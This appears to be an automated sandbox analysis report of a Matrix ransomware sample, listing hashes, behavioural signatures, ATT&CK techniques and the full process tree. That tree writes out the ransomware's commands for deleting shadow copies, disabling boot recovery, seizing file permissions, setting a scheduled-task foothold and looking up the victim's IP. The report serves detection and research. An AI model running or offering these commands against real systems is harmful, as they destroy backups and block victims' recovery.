Analysis
-
max time kernel
151s -
max time network
16s -
platform
windows7_x64 -
resource
win7 -
submitted
08-10-2020 15:06
General
-
Target
bdd9dbc6d72ecc5ea0a063a1fc99e414a4cff177ec8726da0011134d8589c7d2.exe
-
Size
1.1MB
-
MD5
837d96ee65e177210ad77e0b7a3e2ee1
-
SHA1
9f96a1acbcf006bf9cc61119dc76ca47adf63066
-
SHA256
bdd9dbc6d72ecc5ea0a063a1fc99e414a4cff177ec8726da0011134d8589c7d2
-
SHA512
3369cccd102ef223a3d3bcb8b7cd11bc409cdb63bbbce33c8bbd05e6b52bc32b2a9c3ff29202e8107da6eab04e61fab0a7645631821d37bc3120dfe86bc26a62
Malware Config
Extracted
http://myexternalip.com/raw
Signatures
-
Matrix Ransomware 495 IoCs
Targeted ransomware with information collection and encryption functionality.
-
Deletes shadow copies 2 TTPs
Ransomware often targets backup files to inhibit system recovery.
-
Modifies boot configuration data using bcdedit 1 TTPs 2 IoCs
-
Blacklisted process makes network request 1 IoCs
-
Drops file in Drivers directory 1 IoCs
-
Executes dropped EXE 3 IoCs
-
Modifies extensions of user files 2 IoCs
Ransomware generally changes the extension on encrypted files.
-
Sets service image path in registry 2 TTPs
-
UPX packed file 3 IoCs
Detects executables packed with UPX/modified UPX open source packer.
-
Loads dropped DLL 4 IoCs
-
Modifies file permissions 1 TTPs 1 IoCs
-
Enumerates connected drives 3 TTPs 46 IoCs
Attempts to read the root path of hard drives other than the default C: drive.
-
Looks up external IP address via web service 1 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
-
Drops file in System32 directory 1 IoCs
-
Modifies service 2 TTPs 11 IoCs
-
Sets desktop wallpaper using registry 2 TTPs 1 IoCs
-
Drops file in Program Files directory 7637 IoCs
-
Creates scheduled task(s) 1 TTPs 1 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
-
Interacts with shadow copies 2 TTPs 2 IoCs
Shadow copies are often targeted by ransomware to inhibit system recovery.
-
Modifies Control Panel 5 IoCs
-
Suspicious behavior: EnumeratesProcesses 7 IoCs
-
Suspicious behavior: LoadsDriver 1 IoCs
-
Suspicious use of AdjustPrivilegeToken 47 IoCs
-
Suspicious use of WriteProcessMemory 108 IoCs
-
Views/modifies file attributes 1 TTPs 1 IoCs
Processes
-
C:\Users\Admin\AppData\Local\Temp\bdd9dbc6d72ecc5ea0a063a1fc99e414a4cff177ec8726da0011134d8589c7d2.exe"C:\Users\Admin\AppData\Local\Temp\bdd9dbc6d72ecc5ea0a063a1fc99e414a4cff177ec8726da0011134d8589c7d2.exe"1⤵
- Matrix Ransomware
- Modifies extensions of user files
- Loads dropped DLL
- Enumerates connected drives
- Drops file in Program Files directory
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /C copy /V /Y "C:\Users\Admin\AppData\Local\Temp\bdd9dbc6d72ecc5ea0a063a1fc99e414a4cff177ec8726da0011134d8589c7d2.exe" "C:\Users\Admin\AppData\Local\Temp\NWt29TaW.exe"2⤵
-
C:\Users\Admin\AppData\Local\Temp\NWt29TaW.exe"C:\Users\Admin\AppData\Local\Temp\NWt29TaW.exe" -n2⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /C powershell "$webClient = New-Object -TypeName System.Net.WebClient; $webClient.DownloadString('http://myexternalip.com/raw')">"C:\Users\Admin\AppData\Local\Temp\u0rUqag5.txt"2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell "$webClient = New-Object -TypeName System.Net.WebClient; $webClient.DownloadString('http://myexternalip.com/raw')"3⤵
- Blacklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /C reg add "HKCU\Control Panel\Desktop" /v Wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Roaming\HMC7e7et.bmp" /f & reg add "HKCU\Control Panel\Desktop" /v WallpaperStyle /t REG_SZ /d "0" /f & reg add "HKCU\Control Panel\Desktop" /v TileWallpaper /t REG_SZ /d "0" /f2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\reg.exereg add "HKCU\Control Panel\Desktop" /v Wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Roaming\HMC7e7et.bmp" /f3⤵
- Sets desktop wallpaper using registry
- Modifies Control Panel
-
C:\Windows\SysWOW64\reg.exereg add "HKCU\Control Panel\Desktop" /v WallpaperStyle /t REG_SZ /d "0" /f3⤵
- Modifies Control Panel
-
C:\Windows\SysWOW64\reg.exereg add "HKCU\Control Panel\Desktop" /v TileWallpaper /t REG_SZ /d "0" /f3⤵
- Modifies Control Panel
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /C wscript //B //Nologo "C:\Users\Admin\AppData\Roaming\Y4WPsKrv.vbs"2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\wscript.exewscript //B //Nologo "C:\Users\Admin\AppData\Roaming\Y4WPsKrv.vbs"3⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /C schtasks /Create /tn DSHCA /tr "C:\Users\Admin\AppData\Roaming\okwFHopK.bat" /sc minute /mo 5 /RL HIGHEST /F4⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /Create /tn DSHCA /tr "C:\Users\Admin\AppData\Roaming\okwFHopK.bat" /sc minute /mo 5 /RL HIGHEST /F5⤵
- Creates scheduled task(s)
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /C schtasks /Run /I /tn DSHCA4⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /Run /I /tn DSHCA5⤵
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\Bhhh00dX.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\IDTemplates\ENU\AdobeID.pdf""2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\attrib.exeattrib -R -A -S "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\IDTemplates\ENU\AdobeID.pdf"3⤵
- Views/modifies file attributes
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\IDTemplates\ENU\AdobeID.pdf" /E /G Admin:F /C3⤵
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\IDTemplates\ENU\AdobeID.pdf"3⤵
- Modifies file permissions
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ZG413Grv.exe -accepteula "AdobeID.pdf" -nobanner3⤵
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\ZG413Grv.exeZG413Grv.exe -accepteula "AdobeID.pdf" -nobanner4⤵
- Executes dropped EXE
- Loads dropped DLL
-
C:\Users\Admin\AppData\Local\Temp\ZG413Grv64.exeZG413Grv.exe -accepteula "AdobeID.pdf" -nobanner5⤵
- Drops file in Drivers directory
- Executes dropped EXE
- Enumerates connected drives
- Modifies service
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: LoadsDriver
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\taskeng.exetaskeng.exe {8F50FA56-A5DD-4327-825B-4CB6264842BB} S-1-5-21-1131729243-447456001-3632642222-1000:AVGLFESB\Admin:Interactive:[1]1⤵
-
C:\Windows\SYSTEM32\cmd.exeC:\Windows\SYSTEM32\cmd.exe /c "C:\Users\Admin\AppData\Roaming\okwFHopK.bat"2⤵
-
C:\Windows\system32\vssadmin.exevssadmin Delete Shadows /All /Quiet3⤵
- Interacts with shadow copies
-
C:\Windows\System32\Wbem\WMIC.exewmic SHADOWCOPY DELETE3⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Exec Unrestricted try {start-process -FilePath "vssadmin" -ArgumentList "delete","shadows","/all","/quiet" -WindowStyle Hidden} catch {}3⤵
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\vssadmin.exe"C:\Windows\system32\vssadmin.exe" delete shadows /all /quiet4⤵
- Interacts with shadow copies
-
C:\Windows\system32\bcdedit.exebcdedit /set {default} recoveryenabled No3⤵
- Modifies boot configuration data using bcdedit
-
C:\Windows\system32\bcdedit.exebcdedit /set {default} bootstatuspolicy ignoreallfailures3⤵
- Modifies boot configuration data using bcdedit
-
C:\Windows\system32\schtasks.exeSCHTASKS /Delete /TN DSHCA /F3⤵
-
C:\Windows\system32\vssvc.exeC:\Windows\system32\vssvc.exe1⤵
- Modifies service
- Suspicious use of AdjustPrivilegeToken
Network
MITRE ATT&CK Matrix ATT&CK v6
Persistence
Registry Run Keys / Startup Folder
1Modify Existing Service
1Scheduled Task
1Hidden Files and Directories
1Defense Evasion
File Deletion
2Modify Registry
3File Permissions Modification
1Hidden Files and Directories
1Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_231c2208-0720-4eec-b9f1-8bba11abd9faMD5
5e3c7184a75d42dda1a83606a45001d8
SHA194ca15637721d88f30eb4b6220b805c5be0360ed
SHA2568278033a65d1ff48be4d86e11f87930d187692f59f8bf2f0a9d170de285afb59
SHA512fae99b6e9b106e0f1c30aa4082b25ae1ad643455c1295c2c16ad534e3e611b9b08492353ffe1af1cfdddc9b2b7c330747a64012c45e62b8f4a4982dcc214e05b
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_3a7043da-0647-49e1-b4d0-8c62781dab10MD5
02ff38ac870de39782aeee04d7b48231
SHA10390d39fa216c9b0ecdb38238304e518fb2b5095
SHA256fbd66a9baf753db31b8de23f2d51b67f8676687503653103080c45b16f1dc876
SHA51224a1ff76ee42ff7a5ea42843928c4df07b06178f7781cd840e1e086e88735d81506eb67259ff1e6ce5aaa7c5baea03886da265eb7e025ff4dc4c4b5f8cd3e341
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_57c6647c-75fc-47bb-8ce4-3b8f0921c533MD5
75a8da7754349b38d64c87c938545b1b
SHA15c28c257d51f1c1587e29164cc03ea880c21b417
SHA256bf08151c174b5d00c9dbc7907b2c6a01b4be76bfa3afce1e8bd98a04ad833c96
SHA512798797bc74c56c874e9a5fdcb0157c04e37a1b3cce285ef064b01bceef8cec45f11a5198918c6c647220b62883606b5e12e3cca3ea369f3a66e69dea6e15f643
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_6d5fa298-996f-4fc9-9c01-b2226cbdaebaMD5
02ff38ac870de39782aeee04d7b48231
SHA10390d39fa216c9b0ecdb38238304e518fb2b5095
SHA256fbd66a9baf753db31b8de23f2d51b67f8676687503653103080c45b16f1dc876
SHA51224a1ff76ee42ff7a5ea42843928c4df07b06178f7781cd840e1e086e88735d81506eb67259ff1e6ce5aaa7c5baea03886da265eb7e025ff4dc4c4b5f8cd3e341
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_7d6878ec-2a8b-418c-8f2b-b6fcd4b50cf8MD5
b6d38f250ccc9003dd70efd3b778117f
SHA1d5a17c02cac698d4f0a4a9b7d71db2aa19e3f18a
SHA2564de9d7b5ccab7b67ca8efc83084c7ee6e5e872b7216ed4683bc5da950bf41265
SHA51267d8195836b7f280d3f9219fd0f58276342e55d5dfdd8a4c54355030d96685d73f1b2b6da0eb39322ec7c3a1d1c5ef06b52d22646cea30a96f822de1800d31e9
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_e43ce3f6-b60d-4b70-bed1-86e53bf07360MD5
df44874327d79bd75e4264cb8dc01811
SHA11396b06debed65ea93c24998d244edebd3c0209d
SHA25655de642c5c9e436ec01c57004dae797022442c3245daf7162d19a5585f221181
SHA51295dc9298b8db059bbe746f67e6a7f8515781c7053cc60c01532e47623a996be7e1bd23d1bd8f5f2045adff27454f44930d503c15b695690088841cedbd2a06c3
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_fabbb9cf-9b8c-4b2f-b33d-0de7a9a3a10eMD5
be4d72095faf84233ac17b94744f7084
SHA1cc78ce5b9c57573bd214a8f423ee622b00ebb1ec
SHA256b0d72c5c22e57913476ac8fc686a4593f137c6667d5094522c0a0685dabd7adc
SHA51243856e9b1032b8690ceea810c931bed3655e9190414bb220fb6afc136f31b8335e07604dffb28405d4006f266a54cff424c527d29924b1b732c9647a3252b097
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheIndexMD5
97b178c73d27fe1b1ff0a5cfc1ed8585
SHA1de31405ecd69ec51f31be86ec25fea2abb151721
SHA25682cfd65d5f38aef7c79dafb3e069a7177313c313d27d6b8bce479bf43a308607
SHA51231dac69dfae543591af24b898697df0e73d052a00456dd3713b0cc1ce49e8782ae8b7ec69475f0bc85593e8c6050896b566fa8f8bc8d7d90562d18f47f5fa1be
-
C:\Users\Admin\AppData\Local\Temp\Bhhh00dX.batMD5
ccef04cb504305fb1bb33425d295931f
SHA19be0c089590f3bfec11976eb012e5e3d1d99d5d1
SHA2569e3bfb61737e38c520f7a2b373833b8c61ab1b487bfe2798fd45158005ab1c04
SHA512c5d0b9f7b27a323d5f5769ba2040592751cbb2a4f36ac8fc95f637024353b107a18976e448ed04f8accc996d4f53e3513cbd857a45decf8627da7b121e5a21af
-
C:\Users\Admin\AppData\Local\Temp\NWt29TaW.exeMD5
837d96ee65e177210ad77e0b7a3e2ee1
SHA19f96a1acbcf006bf9cc61119dc76ca47adf63066
SHA256bdd9dbc6d72ecc5ea0a063a1fc99e414a4cff177ec8726da0011134d8589c7d2
SHA5123369cccd102ef223a3d3bcb8b7cd11bc409cdb63bbbce33c8bbd05e6b52bc32b2a9c3ff29202e8107da6eab04e61fab0a7645631821d37bc3120dfe86bc26a62
-
C:\Users\Admin\AppData\Local\Temp\NWt29TaW.exeMD5
837d96ee65e177210ad77e0b7a3e2ee1
SHA19f96a1acbcf006bf9cc61119dc76ca47adf63066
SHA256bdd9dbc6d72ecc5ea0a063a1fc99e414a4cff177ec8726da0011134d8589c7d2
SHA5123369cccd102ef223a3d3bcb8b7cd11bc409cdb63bbbce33c8bbd05e6b52bc32b2a9c3ff29202e8107da6eab04e61fab0a7645631821d37bc3120dfe86bc26a62
-
C:\Users\Admin\AppData\Local\Temp\ZG413Grv.exeMD5
2f5b509929165fc13ceab9393c3b911d
SHA1b016316132a6a277c5d8a4d7f3d6e2c769984052
SHA2560cfdbfb9c4a2a80794462f06cf0da43c5977aa61bd3bbe834002703fe44ef0b4
SHA512c63eaac9f46f90a991cb27f3039d9d9d3c2bb3e14d199a2c292e4e87a02c3642fdaa918a2d1447f80d6146a95018eb12bb8a6feb9c082b2b2583634330235bc8
-
C:\Users\Admin\AppData\Local\Temp\ZG413Grv.exeMD5
2f5b509929165fc13ceab9393c3b911d
SHA1b016316132a6a277c5d8a4d7f3d6e2c769984052
SHA2560cfdbfb9c4a2a80794462f06cf0da43c5977aa61bd3bbe834002703fe44ef0b4
SHA512c63eaac9f46f90a991cb27f3039d9d9d3c2bb3e14d199a2c292e4e87a02c3642fdaa918a2d1447f80d6146a95018eb12bb8a6feb9c082b2b2583634330235bc8
-
C:\Users\Admin\AppData\Local\Temp\ZG413Grv64.exeMD5
3026bc2448763d5a9862d864b97288ff
SHA17d93a18713ece2e7b93e453739ffd7ad0c646e9e
SHA2567adb21c00d3cc9a1ef081484b58b68f218d7c84a720e16e113943b9f4694d8ec
SHA512d4afd534ed1818f8dc157d754b078e3d2fe4fb6a24ed62d4b30b3a93ebc671d1707cedb3c23473bf3b5aa568901a1e5183da49e41152e352ecfa41bf220ebde6
-
C:\Users\Admin\AppData\Local\Temp\u0rUqag5.txtMD5
75564e2df4b8c8d33695e8e5e58cb03c
SHA164a796a9f01a1f12bcbe641ecc92541a41ece9b5
SHA256bfc3a26300e7bd0144a9974a6cc1f88f555dd022002aab0166aa0813070a8965
SHA512c24aa065ed61adf4f32d9dd1edd089163b0b953a10ef14f87f4095c0677cc27c684c3666ab1911e4e21f2517d1292454c3016255bb3279e2ff48a59257b455af
-
C:\Users\Admin\AppData\Roaming\Y4WPsKrv.vbsMD5
b57836bc3f11de3a486d1d4604025a5a
SHA1a512c4d6e308216dd6812bb15764bf6399d7fa04
SHA2566a8637540f4c77d7804a8afe8b9e0752ef8c8c30314c90b1b873b31e2600fa3a
SHA512cf1a08a053cbea5bdd21745bf61990f35b075f5fe676ea177080ea0a5e20f05f6cc5adb0396700874a1ebb13c1bec444e8454867a7453be66a0532f64085df2e
-
C:\Users\Admin\AppData\Roaming\okwFHopK.batMD5
321b5b696c5b2e56bc6239ffc2f02baf
SHA1cb6e709eec1d29ab893d910275c0d0c4d3556685
SHA256c413ece0eca41d867452a2e0d35236e8fa474a52ed0267eecbd60e0ac2466a0e
SHA5120cc7b1b5953e34f45a7c373af38d5dd9cab759b4fae7ac0fd9e4c9d518af047720c45f176236508a4cebe0a015345235cc598f9334b75f1e3325ec8d688bbad2
-
\Users\Admin\AppData\Local\Temp\NWt29TaW.exeMD5
837d96ee65e177210ad77e0b7a3e2ee1
SHA19f96a1acbcf006bf9cc61119dc76ca47adf63066
SHA256bdd9dbc6d72ecc5ea0a063a1fc99e414a4cff177ec8726da0011134d8589c7d2
SHA5123369cccd102ef223a3d3bcb8b7cd11bc409cdb63bbbce33c8bbd05e6b52bc32b2a9c3ff29202e8107da6eab04e61fab0a7645631821d37bc3120dfe86bc26a62
-
\Users\Admin\AppData\Local\Temp\NWt29TaW.exeMD5
837d96ee65e177210ad77e0b7a3e2ee1
SHA19f96a1acbcf006bf9cc61119dc76ca47adf63066
SHA256bdd9dbc6d72ecc5ea0a063a1fc99e414a4cff177ec8726da0011134d8589c7d2
SHA5123369cccd102ef223a3d3bcb8b7cd11bc409cdb63bbbce33c8bbd05e6b52bc32b2a9c3ff29202e8107da6eab04e61fab0a7645631821d37bc3120dfe86bc26a62
-
\Users\Admin\AppData\Local\Temp\ZG413Grv.exeMD5
2f5b509929165fc13ceab9393c3b911d
SHA1b016316132a6a277c5d8a4d7f3d6e2c769984052
SHA2560cfdbfb9c4a2a80794462f06cf0da43c5977aa61bd3bbe834002703fe44ef0b4
SHA512c63eaac9f46f90a991cb27f3039d9d9d3c2bb3e14d199a2c292e4e87a02c3642fdaa918a2d1447f80d6146a95018eb12bb8a6feb9c082b2b2583634330235bc8
-
\Users\Admin\AppData\Local\Temp\ZG413Grv64.exeMD5
3026bc2448763d5a9862d864b97288ff
SHA17d93a18713ece2e7b93e453739ffd7ad0c646e9e
SHA2567adb21c00d3cc9a1ef081484b58b68f218d7c84a720e16e113943b9f4694d8ec
SHA512d4afd534ed1818f8dc157d754b078e3d2fe4fb6a24ed62d4b30b3a93ebc671d1707cedb3c23473bf3b5aa568901a1e5183da49e41152e352ecfa41bf220ebde6
-
memory/108-54-0x0000000002820000-0x0000000002824000-memory.dmpFilesize
16KB
-
memory/108-34-0x0000000000000000-mapping.dmp
-
memory/388-58-0x0000000000000000-mapping.dmp
-
memory/568-56-0x0000000000000000-mapping.dmp
-
memory/572-104-0x0000000000000000-mapping.dmp
-
memory/656-29-0x00000000062D0000-0x00000000062D1000-memory.dmpFilesize
4KB
-
memory/656-15-0x0000000005660000-0x0000000005661000-memory.dmpFilesize
4KB
-
memory/656-28-0x00000000062B0000-0x00000000062B1000-memory.dmpFilesize
4KB
-
memory/656-20-0x00000000060B0000-0x00000000060B1000-memory.dmpFilesize
4KB
-
memory/656-21-0x0000000006130000-0x0000000006131000-memory.dmpFilesize
4KB
-
memory/656-12-0x00000000027B0000-0x00000000027B1000-memory.dmpFilesize
4KB
-
memory/656-11-0x0000000000DB0000-0x0000000000DB1000-memory.dmpFilesize
4KB
-
memory/656-7-0x0000000000000000-mapping.dmp
-
memory/656-8-0x0000000074390000-0x0000000074A7E000-memory.dmpFilesize
6.9MB
-
memory/656-9-0x00000000009C0000-0x00000000009C1000-memory.dmpFilesize
4KB
-
memory/656-10-0x00000000049C0000-0x00000000049C1000-memory.dmpFilesize
4KB
-
memory/672-6-0x0000000000000000-mapping.dmp
-
memory/808-36-0x0000000000000000-mapping.dmp
-
memory/924-37-0x0000000000000000-mapping.dmp
-
memory/1204-101-0x0000000000000000-mapping.dmp
-
memory/1320-52-0x0000000000000000-mapping.dmp
-
memory/1360-53-0x0000000000000000-mapping.dmp
-
memory/1364-39-0x0000000000000000-mapping.dmp
-
memory/1468-41-0x0000000000000000-mapping.dmp
-
memory/1472-63-0x000000001AA30000-0x000000001AA31000-memory.dmpFilesize
4KB
-
memory/1472-78-0x000000001B430000-0x000000001B431000-memory.dmpFilesize
4KB
-
memory/1472-99-0x000000001B700000-0x000000001B701000-memory.dmpFilesize
4KB
-
memory/1472-60-0x0000000000000000-mapping.dmp
-
memory/1472-61-0x000007FEF5480000-0x000007FEF5E6C000-memory.dmpFilesize
9.9MB
-
memory/1472-62-0x0000000002580000-0x0000000002581000-memory.dmpFilesize
4KB
-
memory/1472-92-0x000000001B4E0000-0x000000001B4E1000-memory.dmpFilesize
4KB
-
memory/1472-64-0x000000001A750000-0x000000001A751000-memory.dmpFilesize
4KB
-
memory/1472-65-0x000000001A780000-0x000000001A781000-memory.dmpFilesize
4KB
-
memory/1472-85-0x000000001B420000-0x000000001B421000-memory.dmpFilesize
4KB
-
memory/1472-69-0x000000001B3C0000-0x000000001B3C1000-memory.dmpFilesize
4KB
-
memory/1472-74-0x000000001A7A0000-0x000000001A7A1000-memory.dmpFilesize
4KB
-
memory/1472-75-0x000000001A9A0000-0x000000001A9A1000-memory.dmpFilesize
4KB
-
memory/1472-76-0x000000001B400000-0x000000001B401000-memory.dmpFilesize
4KB
-
memory/1472-77-0x000000001B420000-0x000000001B421000-memory.dmpFilesize
4KB
-
memory/1492-0-0x0000000000000000-mapping.dmp
-
memory/1532-31-0x0000000000000000-mapping.dmp
-
memory/1572-35-0x0000000000000000-mapping.dmp
-
memory/1696-33-0x0000000000000000-mapping.dmp
-
memory/1708-42-0x0000000000000000-mapping.dmp
-
memory/1752-51-0x0000000000000000-mapping.dmp
-
memory/1792-49-0x0000000000000000-mapping.dmp
-
memory/1812-4-0x0000000000000000-mapping.dmp
-
memory/1820-46-0x0000000000000000-mapping.dmp
-
memory/1824-43-0x0000000000000000-mapping.dmp
-
memory/1844-102-0x0000000000000000-mapping.dmp
-
memory/1888-59-0x0000000000000000-mapping.dmp
-
memory/1888-55-0x0000000000000000-mapping.dmp
-
memory/1956-32-0x0000000000000000-mapping.dmp
-
memory/2024-103-0x0000000000000000-mapping.dmp